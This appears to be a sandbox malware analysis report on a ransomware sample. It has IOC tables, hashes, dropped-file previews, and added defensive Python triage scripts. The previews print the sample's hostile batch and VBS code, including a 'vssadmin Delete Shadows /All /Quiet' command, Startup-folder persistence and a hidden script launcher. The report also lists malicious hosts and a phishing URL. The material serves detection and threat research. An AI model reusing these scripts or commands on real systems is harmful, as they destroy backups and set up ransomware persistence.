• Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information
• Report size exceeded maximum capacity and may have missing disassembly code
• Report size getting too big: too many NtOpenKeyEx calls found
• Report size getting too big: too many NtProtectVirtualMemory calls found
• Report size getting too big: too many NtQueryValueKey calls found
• VT rate limit hit for: BiXS3FRoLe.exe
Time | Type | Description
07:43:17 | API Interceptor | 1x Sleep call for process: MpCmdRun.exe modified
13:42:19 | Task Scheduler | Run new task: Microsoft_Auto_Scheduler, path: "C:\Users\user\AppData\S-2153.bat"
13:42:19 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe
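The two 13:42:19 rows above are the classic pair of user-land persistence primitives: a scheduled task with a Microsoft-styled name whose action is a batch file under AppData, and a bare executable dropped into the per-user Startup folder. The script below is an added triage example, not part of the Joe Sandbox report and not the sample's code: it parses the verbose CSV output of `schtasks /query` plus a Startup-folder listing and flags exactly that pattern. The CSV column names (TaskName, Task To Run) are assumed from that command's `/fo CSV /v` format, the sample rows and Startup entries are constructed so it runs offline, and the directory and extension heuristics are starting points to tune, not a signature for this family.

```python
"""Triage scheduled tasks and Startup-folder entries for user-land persistence."""
import csv
import io
import os
import re
import subprocess

# User-writable directories that a scheduled-task action rarely has a legitimate
# reason to live in (assumption: tune for your environment).
USER_WRITABLE_RE = re.compile(r"\\(AppData|Temp|Public|ProgramData)\\", re.IGNORECASE)
SCRIPT_EXT_RE = re.compile(r"\.(bat|cmd|vbs|vbe|js|jse|wsf|hta|ps1)(\s|\"|$)", re.IGNORECASE)
# Only .lnk shortcuts (and desktop.ini) are normal in a Startup folder; a bare PE or script is not.
STARTUP_OK_EXT = {".lnk", ".ini"}

# Constructed sample of `schtasks /query /fo CSV /v` output (column names assumed from that
# command's verbose CSV format); the second row mirrors the task seen in the report timeline.
SAMPLE_SCHTASKS_CSV = r'''"HostName","TaskName","Next Run Time","Status","Logon Mode","Last Run Time","Last Result","Author","Task To Run"
"DESKTOP-1","\Microsoft\Windows\Defrag\ScheduledDefrag","N/A","Ready","Interactive/Background","N/A","0","Microsoft Corporation","%windir%\system32\defrag.exe -c -h -o -$"
"DESKTOP-1","\Microsoft_Auto_Scheduler","12/6/2024 1:43:19 PM","Ready","Interactive only","N/A","0","user","C:\Users\user\AppData\S-2153.bat"
'''


def classify_task(task_name: str, task_to_run: str) -> list[str]:
    """Return the reasons a task looks like user-land persistence (empty list = nothing odd)."""
    reasons = []
    if USER_WRITABLE_RE.search(task_to_run):
        reasons.append("action lives in a user-writable directory")
    if SCRIPT_EXT_RE.search(task_to_run):
        reasons.append("action is a script, not a signed binary")
    # Genuine Microsoft tasks sit under the \Microsoft\ task folder; a root-level task
    # carrying "Microsoft" in its name is a common masquerade.
    lowered = task_name.lower()
    if "microsoft" in lowered and not lowered.startswith("\\microsoft\\"):
        reasons.append("Microsoft-styled name outside the \\Microsoft\\ task folder")
    return reasons


def find_suspicious_tasks(csv_text: str) -> list[dict]:
    """Parse verbose schtasks CSV and return the tasks that trip classify_task()."""
    findings = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        name = row.get("TaskName", "") or ""
        action = row.get("Task To Run", "") or ""
        if name == "TaskName":  # verbose output may repeat the header block per folder
            continue
        reasons = classify_task(name, action)
        if reasons:
            findings.append({"task": name, "action": action, "reasons": reasons})
    return findings


def check_startup(entries: list[str]) -> list[str]:
    """Return Startup-folder entries that are not shortcuts, e.g. a dropped .exe."""
    return [e for e in entries if os.path.splitext(e)[1].lower() not in STARTUP_OK_EXT]


def query_schtasks() -> str:
    """Live collection on the host being triaged (Windows only)."""
    return subprocess.run(["schtasks", "/query", "/fo", "CSV", "/v"],
                          capture_output=True, text=True, check=True).stdout


if __name__ == "__main__":
    if os.name == "nt":
        csv_text = query_schtasks()
        startup = os.path.expandvars(r"%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup")
        entries = os.listdir(startup) if os.path.isdir(startup) else []
    else:  # constructed data so the script demonstrates itself off-box
        csv_text, entries = SAMPLE_SCHTASKS_CSV, ["desktop.ini", "OneNote.lnk", "Xinfecter.exe"]
    for f in find_suspicious_tasks(csv_text):
        print(f"[task] {f['task']} -> {f['action']}: {'; '.join(f['reasons'])}")
    for e in check_startup(entries):
        print(f"[startup] non-shortcut entry: {e}")
```

On the constructed input the Defrag task passes clean and Microsoft_Auto_Scheduler trips all three checks; the same script run on a live host pulls the real task list and Startup folder.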
Match | Associated Sample Name / URL | Detection | Threat Name | Context
104.26.13.205 | Simple1.exe | malicious | Unknown | api.ipify.org/
104.26.13.205 | 2b7cu0KwZl.exe | malicious | Unknown | api.ipify.org/
104.26.13.205 | file.exe | malicious | Unknown | api.ipify.org/
104.26.13.205 | file.exe | malicious | LummaC, PrivateLoader, Stealc, Vidar | api.ipify.org/
104.26.13.205 | file.exe | malicious | LummaC, PrivateLoader, Stealc, Vidar | api.ipify.org/
104.26.13.205 | file.exe | malicious | RDPWrap Tool | api.ipify.org/
104.26.13.205 | Prismifyr-Install.exe | malicious | Node Stealer | api.ipify.org/
104.26.13.205 | file.exe | malicious | LummaC, PrivateLoader, Stealc, Vidar | api.ipify.org/
104.26.13.205 | file.exe | malicious | LummaC, RDPWrap Tool, LummaC Stealer, Vidar | api.ipify.org/
104.26.13.205 | file.exe | malicious | Unknown | api.ipify.org/
185.147.34.53 | GD8c7ARn8q.exe | malicious | TrojanRansom |
185.147.34.53 | 8AbMCL2dxM.exe | malicious | RCRU64, TrojanRansom |
185.147.34.53 | Help.File@zohomail.eu_Fast.exe | malicious | TrojanRansom |
185.147.34.53 | Xinfecter.exe | malicious | TrojanRansom |
185.147.34.53 | Ross.dec1966@gmail.com_Fast.bin.exe | malicious | Babuk, Chaos, Conti, RegretLocker, TrojanRansom |
185.147.34.53 | 12.exe1 | malicious | BTC, Conti, Neshta, RegretLocker, TrojanRansom |
185.147.34.53 | DttL6H1DqQ.exe | malicious | Babuk, Chaos, Conti |
185.147.34.53 | PAvH6odjUO.exe | malicious | Voidcrypt |

Match | Associated Sample Name / URL | Detection | Threat Name | Context
api.ipify.org | GD8c7ARn8q.exe | malicious | TrojanRansom | 104.26.12.205
api.ipify.org | 8AbMCL2dxM.exe | malicious | RCRU64, TrojanRansom | 104.26.12.205
api.ipify.org | Simple1.exe | malicious | Unknown | 172.67.74.152
api.ipify.org | Simple1.exe | malicious | Unknown | 104.26.13.205
api.ipify.org | Simple2.exe | malicious | Unknown | 104.26.12.205
api.ipify.org | Simple2.exe | malicious | Unknown | 172.67.74.152
api.ipify.org | systemConfigChecker.exe | malicious | Unknown | 172.67.74.152
api.ipify.org | systemConfigChecker.exe | malicious | Unknown | 172.67.74.152
api.ipify.org | kYGxoN4JVW.bat | malicious | Unknown | 172.67.74.152
api.ipify.org | REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe | malicious | AgentTesla | 104.26.13.205

Match | Associated Sample Name / URL | Detection | Threat Name | Context
HOSTSLIM-GLOBAL-NETWORKNL | GD8c7ARn8q.exe | malicious | TrojanRansom | 185.147.34.53
HOSTSLIM-GLOBAL-NETWORKNL | 8AbMCL2dxM.exe | malicious | RCRU64, TrojanRansom | 185.147.34.53
HOSTSLIM-GLOBAL-NETWORKNL | la.bot.sparc.elf | malicious | Unknown | 213.166.86.57
HOSTSLIM-GLOBAL-NETWORKNL | cenSXPimaG.elf | malicious | Mirai, Okiru | 213.166.86.22
HOSTSLIM-GLOBAL-NETWORKNL | SWIFT COPY.exe | malicious | FormBook | 103.214.4.45
HOSTSLIM-GLOBAL-NETWORKNL | REMITTANCE SLIP.exe | malicious | FormBook | 103.214.4.45
HOSTSLIM-GLOBAL-NETWORKNL | STATEMENT OF ACCOUNT.exe | malicious | FormBook | 103.214.4.45
HOSTSLIM-GLOBAL-NETWORKNL | PAYMENT SWIFT.exe | malicious | FormBook | 103.214.4.45
HOSTSLIM-GLOBAL-NETWORKNL | PAYMENT RECEIPT.exe | malicious | FormBook | 103.214.4.45
HOSTSLIM-GLOBAL-NETWORKNL | hsbc Wire copy.exe | malicious | FormBook | 103.214.4.45
CLOUDFLARENETUS | GD8c7ARn8q.exe | malicious | TrojanRansom | 104.26.12.205
CLOUDFLARENETUS | 8AbMCL2dxM.exe | malicious | RCRU64, TrojanRansom | 104.26.12.205
CLOUDFLARENETUS | file.exe | malicious | LummaC Stealer | 104.21.16.9
CLOUDFLARENETUS | https://rnicrosoft-secured-office.squarespace.com/sharepoint?e=test@test.com.au | malicious | HTMLPhisher | 104.21.25.148
CLOUDFLARENETUS | https://i.postimg.cc/y6hBTtv7/png-Hand-SAward.png | malicious | HTMLPhisher | 104.21.85.204
CLOUDFLARENETUS | file.exe | malicious | LummaC Stealer | 172.67.165.166
CLOUDFLARENETUS | phish_alert_sp2_2.0.0.0.eml | malicious | Unknown | 104.18.69.40
CLOUDFLARENETUS | Simple1.exe | malicious | Unknown | 172.67.74.152
CLOUDFLARENETUS | Pr9cqW75nY.lnk | malicious | Unknown | 104.18.10.207
CLOUDFLARENETUS | G3vWD786PN.lnk | malicious | Unknown | 104.18.11.207
                                                                                                      No context
Process: C:\Users\user\Desktop\BiXS3FRoLe.exe
File Type: ASCII text, with no line terminators
Category: modified
Size (bytes): 12
Entropy (8bit): 2.6258145836939115
Encrypted: false
SSDEEP: 3:fuM9:2I
MD5: E4A5E3AE7A904A86A50AE5FC1A38F374
SHA1: 0B536BF59DE491CCC2CAA8AE52200CD6B61364E9
SHA-256: 4EF53CF7C95DBE1BE9AC5E3D7465B91B911FD5C198EB161A55AF5579D9390C1A
SHA-512: 17D3508E7E847B91E84A06BA32BAD9A6CEC55373EE877E1163AB74EF4E18A72C38DD43897BE21E26556CBDE58DF9446E06B59B2BB37CC0321B5228D57C80A146
Malicious: false
Preview: 8.46.123.228
(The content is a dotted-quad IP address; the only URL strings carved from the sample's own process point at api.ipify.org, a public-IP echo service, so this is most likely the victim's external address written to disk.)
Process: C:\Users\user\Desktop\BiXS3FRoLe.exe
File Type: ASCII text, with very long lines (3460), with no line terminators
Category: dropped
Size (bytes): 3460
Entropy (8bit): 6.016381721433506
Encrypted: false
SSDEEP: 96:0TN4B2J/vqg6B97NhWVKIrGi4DHoBBF51hJFUJdz:0C2Po95hUJ4cBNHfUT
MD5: C7C3DBD832C646864700496AD134ED0A
SHA1: B9A086E16664CF20139497B829585C315825F2BF
SHA-256: 47974541A2D947140126838D0C99953052AE3068A3D569B9D7D0FAAECCDFA2FE
SHA-512: 31B48418A0A7145374BCF2E3B6E4DAD43EBBF276F608890EC686133F7EBF4450AE4DBA3B98FA2AA49807B68A74F74B74D435627AF43B5C9D0380D29B62E128D4
Malicious: true
Preview: $0f3apG3JmpPJ2ELWkOavNuQU2tPswQTl8iqYh8cGxridJPxH9L+5HxNVetJgDzqndMlnV7e4b/agodsxVFzuKAIcCJMZDPDgB8ylWnJvZ005QVq7y70mFrOOcbJIFO6B4aVDe2RVI1C1UrbxxjpYw2e3uaKQKnhvJHr9JXJUNn3GQ8vbNzFuptzF+WQ4xinN25+qjFnXM3RRok9rItpGkp2pndprYb8obJNcemIqn0DXQWlK2hg9bkowcwLD2RNLDStew04NrD5kQxkkgtPlvnMXSjQbrletL8Es4fLByq2YE88dh1q9DjgSu2fyK8GEU3prT3wpNsXUhW57a5fsKXg==$1kblXSyCY1np+z59QF0xNhr2jeczI7DC61Xx/iWwOO7iQJUPv3LPgvR17GXDnhjjwZTrT4DtTefAjZu1AAJ6pLZ3TUfdOibmhSUuISnlX26Ok0VzT+s4bjCWpTUlNW5+7jKcq4cucduSY3AjNuGuYBjnZzpLVRYU21QL47KKPJt+TayH6d/MI6YoZ6I0VnMWBkdpCz8Zg3QAa1/Q6fWZ/Jp0ZkPRpQ9ayvGCfwkBaeEWNxDXzhry0A+G2CDd9zjwRX0XeFg/LSkbwibeC4xnWjqAgjEIlHFv/OTCuV5zbEWUluuRVQdkKqsOzdSOJWPkeKnFm35WgK4ySKMAEAjgZyQ==$2Iz1PXlLv5yrzpW+3OAjCL2BRZdHA+DaPXSYVJQ/hwy8PDltISGRxYyUAMeG3zInY7IFgLNZf9Bp1q8VtX2mjF2nydhbfTcjueR4XNrO5Zt2wt67Ti0RWCYefaD7YoQv32qtnNukq4AWG1aNZa7pApCamxiIzN/q0CJPs3MzzTxlmEAo/CMIukeuBYbwSXI0gfkCHT+PjPctg9y5Q4LkK+QxyvbCrqzqZH99a/9aOjHEtmzgVgAyLzLc3EUWlcLndTVZHpIcQZk2a6xVohFIM62BlLHFM1T3KhSY6Fs3MMWh2NSOAIk
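The 3460-byte file above reads as a run of "$0", "$1", "$2" tags, each followed by base64 that ends in "==". Base64 of 256 bytes is exactly 344 characters with that padding, and 10 × (2 + 344) = 3460, so the file is consistent with ten 256-byte blobs, the size of an RSA-2048 ciphertext, which is how many ransomware families keep per-victim key material wrapped to an embedded public key. The report does not say what the blobs are, so that stays a hypothesis to confirm against the sample's crypto routines. The Python below is an added example, not the sample's or Joe Sandbox's code, that splits a file in this layout and sizes its parts; the one-digit tag assumption and the deterministic stand-in blobs are constructed so it runs offline (the real file is not on the page, only a truncated preview).

```python
"""Split a "$<n><base64>" segmented blob file and size its parts for triage."""
import base64
import binascii
import hashlib
import re

# Layout inferred from the preview: a one-digit "$<n>" tag, then standard base64.
# Assumption: indexes 0-9, which the size arithmetic 3460 = 10 * (2 + 344) supports.
SEGMENT_RE = re.compile(r"\$(\d)([A-Za-z0-9+/]+={0,2})")
RSA2048_BLOCK = 256  # bytes in an RSA-2048 ciphertext or signature


def split_segments(text: str) -> list[tuple[int, bytes]]:
    """Return (index, decoded bytes) for every segment, in file order; ValueError on bad base64."""
    out = []
    for m in SEGMENT_RE.finditer(text):
        idx, b64 = int(m.group(1)), m.group(2)
        try:
            out.append((idx, base64.b64decode(b64, validate=True)))
        except binascii.Error as e:
            raise ValueError(f"segment ${idx}: malformed base64 ({e})") from None
    return out


def summarize(text: str) -> dict:
    """Triage summary: blob count, per-blob sizes, and whether every blob is RSA-2048 sized."""
    segs = split_segments(text)
    sizes = [len(b) for _, b in segs]
    return {
        "chars": len(text),
        "segments": len(segs),
        "indexes": [i for i, _ in segs],
        "sizes": sizes,
        "all_rsa2048_sized": bool(sizes) and all(s == RSA2048_BLOCK for s in sizes),
    }


def build_file(blobs: list[bytes]) -> str:
    """Re-create the observed layout from raw blobs (lets the parser be tested offline)."""
    return "".join(f"${i}{base64.b64encode(b).decode()}" for i, b in enumerate(blobs))


def make_sample_blobs(n: int = 10) -> list[bytes]:
    """Constructed stand-ins for the real blobs: deterministic 256-byte pseudo-random blocks."""
    return [hashlib.sha256(f"blob-{i}".encode()).digest() * (RSA2048_BLOCK // 32) for i in range(n)]


if __name__ == "__main__":
    sample = build_file(make_sample_blobs())
    print(summarize(sample))
```

Run against the real dropped file, a result of ten 256-byte segments supports the wrapped-key reading; any other sizes (for example 16 or 32 bytes) point at raw AES keys or IVs instead.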
Process: C:\Users\user\Desktop\BiXS3FRoLe.exe
File Type: PE32 executable (console) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 1257984
Entropy (8bit): 6.5880778432190095
Encrypted: false
SSDEEP: 24576:sA4Lon3mf91eozjjwgCT13ssRJRuTB4yWTrUa+9MoK2jzblKPBvoIGXw1:4LO01eoz7a1JRuTBYrMMajzblqBvoIG+
MD5: 8F807535948B5E93317BAF48A4D0E69D
SHA1: 9C3A19D95EBD7D43CC37437237FBC75EBD541BF0
SHA-256: 1E89B482A11BDDA467322CCA6A8A06621FC834587BFEB682CDA22EE93885FE84
SHA-512: B12CAB19E0E4181164F88B8B64EE9E03BD01D7AABA500BDF86F886D0050BEF1A3D420DD5D395CA60059E348324458E9F63A06CA9A9EB202D6302AAE5B4E7C73A
Malicious: true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 84%
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........Jid.+.7.+.7.+.7,..7.+.7,..7++.7,..7.+.7,A.6.+.7,A.6.+.7,A.6.+.7.S.7.+.7.+.7A+.7.@.6.+.7.@.6.+.7.@.7.+.7.@.6.+.7Rich.+.7................PE..L....;.e............................1........0....@.......................................@.....................................................................(...pV..8...................LW.......V..@............0..(............................text............................... ..`.rdata.......0......................@..@.data...x...........................@....rsrc................X..............@..@.reloc..(............Z..............@..B................................................................................................................................................................................................................................................................................................
(The SHA-256 matches the Original Sample Name above: this dropped PE is a byte-for-byte copy of the submitted sample.)
Process: C:\Users\user\Desktop\BiXS3FRoLe.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 26
Entropy (8bit): 3.95006375643621
Encrypted: false
SSDEEP: 3:ggPYV:rPYV
MD5: 187F488E27DB4AF347237FE461A079AD
SHA1: 6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256: 255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512: 89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious: true
Preview: [ZoneTransfer]....ZoneId=0
(This is the content of a Zone.Identifier alternate data stream; ZoneId=0 is the Local Machine zone, so the file it belongs to carries no Mark-of-the-Web.)
                                                                                                      Process:C:\Users\user\Desktop\BiXS3FRoLe.exe
                                                                                                      File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):138
                                                                                                      Entropy (8bit):4.970414275542141
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:mKDD/j2hFHTnmTPcYWA6/hEREVdPTHAF6vWEzn9TmTPcYWA6/hEREVdPTHAoU:hGh9TnmTPYA6/Si3rHV7TQTPYA6/Si36
                                                                                                      MD5:82A528CBF39B8EA7E2982E7B2305204C
                                                                                                      SHA1:717836E0E2B304ED7AE239CC1DB0F6F80E0419B1
                                                                                                      SHA-256:616738526C38E04F992B7B9FC60CB7FEB3EE416BF47B69AA2C3A5F1A722A653B
                                                                                                      SHA-512:EFF7654E171DBD9BC471718A7E14EE3C84A9EDF948F4C8863C8107E653BE8BA06BC7A2876D506D6E4AE7EF2280E820D04615EBCD88894EF01B3667D070241DB3
                                                                                                      Malicious:true
                                                                                                      Preview:@echo off..IF EXIST "%SystemDrive%\Users\%username%\AppData\S-8459.vbs" (..start "" "%SystemDrive%\Users\%username%\AppData\S-8459.vbs"..)
                                                                                                      Process:C:\Users\user\Desktop\BiXS3FRoLe.exe
                                                                                                      File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1843
                                                                                                      Entropy (8bit):5.353426244393048
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:NKsoW31hnuYWnui9DW3eq5uhnuYWnuiGhnuYZXXuXzYnc4hg0hLdY:7nkYlihqIkYliGkYZuX2BJnY
                                                                                                      MD5:D1846A426D12CE1263DC4819EAB274C2
                                                                                                      SHA1:7E11F19952D25BB7E4E89BCA8BF494AE057AB6BD
                                                                                                      SHA-256:6F38DC0BCB6EEC8CD367AC358A8166E81AE610DF871BEDA5C7EBDAA08E0ABDAC
                                                                                                      SHA-512:7F47AD159499D35C210F2FC8E01BEC5396974154DEC5636A735954BFAF2E00CC0BACBD72D1A70CD9B599AD3E8BD4FEF13B60508C54E97734433C8907B9B0C62D
                                                                                                      Malicious:true
                                                                                                      Preview:@echo off..tasklist /v | find /I /c "dcdcf" > nul..if "%ERRORLEVEL%" == "0" goto ErrorAlreadyRunning..set lend=deb..vssadmin.exe Delete Shadows /All /Quiet..title dcdcf..goto notend..:ErrorAlreadyRunning..exit..:secthree..tasklist /fi "ImageName eq BiXS3FRoLe.exe" /fo csv 2>NUL | find /I "BiXS3FRoLe.exe">NUL..if "%ERRORLEVEL%"=="0" goto imer..if %lend% == bed (goto akakak)..set lend=bed..IF EXIST "%SystemDrive%\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" (..start /d "%SystemDrive%\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\" Xinfecter.exe ..)..:secttwo..tasklist /fi "ImageName eq BiXS3FRoLe.exe" /fo csv 2>NUL | find /I "BiXS3FRoLe.exe">NUL..if "%ERRORLEVEL%"=="0" goto notend..goto secton..:notend..timeout /t 15 /nobreak >NUL..IF NOT EXIST "C:\Users\ReadMe.hta" (..goto secttwo..:secton..IF EXIST "%SystemDrive%\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe"
                                                                                                      Process:C:\Users\user\Desktop\BiXS3FRoLe.exe
                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):686
                                                                                                      Entropy (8bit):5.1743757294368
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:MDhOfTK2Opx6/SYSHFagnXoWHgvvT9vTnMS8h92Mbx6/SYTlZ7D:s6f9/SY7UgDVnMS8j2Mbs/SYTlZH
                                                                                                      MD5:ED7A274FF8AC640416952BFB5D6C927A
                                                                                                      SHA1:6B33CD5B39DB6E9A900336E446F64A137F0A0F42
                                                                                                      SHA-256:4D68E4A7A437EB4A7AD9C7B28BDDA894A68AE41EFBA8A5E4D3A6A930BEBFEEA5
                                                                                                      SHA-512:8F3A4F071550AFE716C5D39601CF1E8559084FBB701E95B28EB7685FED6D8A972E662AD19124A2242FD30C291B8DD1F18F1A2DCF56AC6C98F2BF96BAC91510F3
                                                                                                      Malicious:true
                                                                                                      Preview:Dim strScript..Dim oExec, oWshShell..Dim ComSpec..Set oWshShell = CreateObject("WScript.Shell")..ComSpec = oWshShell.ExpandEnvironmentStrings("%comspec%")..strScript = ComSpec & " /C echo %SystemDrive%\Users\%username%\AppData\S-6748.bat"..Set oExec = oWshShell.Exec (strScript)..Dim outputsxc..outputsxc = oExec.StdOut.ReadAll()..Set fso = CreateObject("Scripting.FileSystemObject")..outputsxc = Replace(outputsxc, vbCr, "")..outputsxc = Replace(outputsxc, vbLf, "")..If (fso.FileExists(outputsxc)) Then..Set WinScriptHost = CreateObject("WScript.Shell")..WinScriptHost.Run Chr(34) & "%SystemDrive%\Users\%username%\AppData\S-6748.bat" & Chr(34), 0..Set WinScriptHost = Nothing..End If
                                                                                                      Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                      Category:modified
                                                                                                      Size (bytes):4926
                                                                                                      Entropy (8bit):3.245232885046662
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:FaqdF7w8l0+AAHdKoqKFxcxkF28lraqdF72+AAHdKoqKFxcxkF2:cEG+AAsoJjykcE2+AAsoJjykg
                                                                                                      MD5:2D92A5BCFE12C966548378AC8AF3D9ED
                                                                                                      SHA1:4B720F3B0ED1A6410CF9E77940FF62211740B3F7
                                                                                                      SHA-256:D169FE28AC012377CB1CFCCE64C9D09DBF09CEE1E46888D8A1C0DBB918736B3A
                                                                                                      SHA-512:43706EE1BA7F07B6F504900C417B9C9505B3C588ADD5E9160F986E64FF30E026918B02CDC1202EB3161EFE5BDC3EB9255C3BA98FA69F75D93BBBECE71B245404
                                                                                                      Malicious:false
                                                                                                      Preview:..........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.m.p.c.m.d.r.u.n...e.x.e.". .-.w.d.e.n.a.b.l.e..... .S.t.a.r.t. .T.i.m.e.:. .. T.h.u. .. O.c.t. .. 0.5. .. 2.0.2.3. .1.2.:.2.8.:.3.6.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....W.D.E.n.a.b.l.e.....*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*. .W.S.C. .S.t.a.t.e. .I.n.f.o. .*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.....*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*. .A.n.t.i.V.i.r.u.s.P.r.o.d.u.c.t. .*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.....d.i.s.p.l.a.y.N.a.m.e. .=. .[.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.].....p.a.t.h.T.o.S.i.g.n.e.d.P.r.o.d.u.c.t.E.x.e. .=. .[.w.i.n.d.o.w.s.d.
                                                                                                      Process:C:\Users\user\Desktop\BiXS3FRoLe.exe
                                                                                                      File Type:ASCII text, with very long lines (417), with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):417
                                                                                                      Entropy (8bit):5.841000360898856
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:BwSxQ0ZYdfRkfG7cuoAFyoQIVVuth+FhKFigxrjav:B7+0ZyR8G7cZWfMPOhKiarU
                                                                                                      MD5:A7221F02BD78D0A59F8DCAB01545BCE1
                                                                                                      SHA1:D3BF656A19490635D242C6FE6A4ED4DCC449106A
                                                                                                      SHA-256:C916825E2FA0D48E9A0F657DF2B6EB76ECC9579DC7A77E1310C15DC81C1F0E41
                                                                                                      SHA-512:2962B0170BB8A54EC6D23C338B4D20181A5875DC05322DD7C474CD79446ABB5689E37F1D88E29CF90CC0182E2332A926D9C30043DD457654486FCFFF5887F5F2
                                                                                                      Malicious:true
                                                                                                      Preview:n7t0MIIBIDANBgkqhkiG9w0BAQEFAAOCAQ0AMIIBCAKCAQEArY/vdbNAh/Il+zaCQIECZ+pNwPY+UeK/h6E+98CE5GcwvBh4t8xSbgH8IsWU1uAaXG9cPTGe66AOwLyOqqQKZK/DksL6ZxvGG3Di+E9FX2u03GnHZv9910p+3mltPDTSKZjn0etnVgGH1nG3n0xf2Z1lQXuJGOekZ0mCxMGoKsIIUlzA37qvWQ9w/D0gl2z+YNLEVfJ39nXbsXG7UU7kEJOhqyD6OKL9qU36Q0ZeczmT4WLYY5OR+Aax4a+LSY3q08FpOJGFXtanqADs7/XZdBmYMyAI0tFGMbp0kgnxDl7597u0bT+/xfW5OdEU3O5rEyu8sO7AvH3F8qS96cXlvwIBEQ==p2h621L0Iu4g8.K0Hh2gq
                                                                                                      Process:C:\Windows\SysWOW64\find.exe
                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):50
                                                                                                      Entropy (8bit):4.389275070710713
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:HWHJpHSURHXLWupDEIv:HWp8URHbhpoS
                                                                                                      MD5:0F40E88D0E7C7A46EC3C98059170D61E
                                                                                                      SHA1:2D73B9559D5E9C9E4995EF6D10BC281E87E9FB30
                                                                                                      SHA-256:158C52C35C888ECE4ED2C1758C8631FF4A26CAA8CC270BA318E7ABD9511881A6
                                                                                                      SHA-512:5C622592D4269A792A5D6144B46269B2A8D8CD94446BD51324D5FB22FED973F7CED2468D75F7ABB00A89A2D027D4E11A41D29B96A749B327E43DA9896029B4CB
                                                                                                      Malicious:false
                                                                                                      Preview:"BiXS3FRoLe.exe","7364","Console","1","15'432 K"..
                                                                                                      File type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                      Entropy (8bit):6.5880778432190095
                                                                                                      TrID:
                                                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                      File name:BiXS3FRoLe.exe
                                                                                                      File size:1'257'984 bytes
                                                                                                      MD5:8f807535948b5e93317baf48a4d0e69d
                                                                                                      SHA1:9c3a19d95ebd7d43cc37437237fbc75ebd541bf0
                                                                                                      SHA256:1e89b482a11bdda467322cca6a8a06621fc834587bfeb682cda22ee93885fe84
                                                                                                      SHA512:b12cab19e0e4181164f88b8b64ee9e03bd01d7aaba500bdf86f886d0050bef1a3d420dd5d395ca60059e348324458e9f63a06ca9a9eb202d6302aae5b4e7c73a
                                                                                                      SSDEEP:24576:sA4Lon3mf91eozjjwgCT13ssRJRuTB4yWTrUa+9MoK2jzblKPBvoIGXw1:4LO01eoz7a1JRuTBYrMMajzblqBvoIG+
                                                                                                      TLSH:E845AE207542C132D56182F05D7CEB9AD0ADBD384F758ACBB3C86B2E4A315D25E36E63
                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........Jid.+.7.+.7.+.7,..7.+.7,..7++.7,..7.+.7,A.6.+.7,A.6.+.7,A.6.+.7.S.7.+.7.+.7A+.7.@.6.+.7.@.6.+.7.@.7.+.7.@.6.+.7Rich.+.7.......
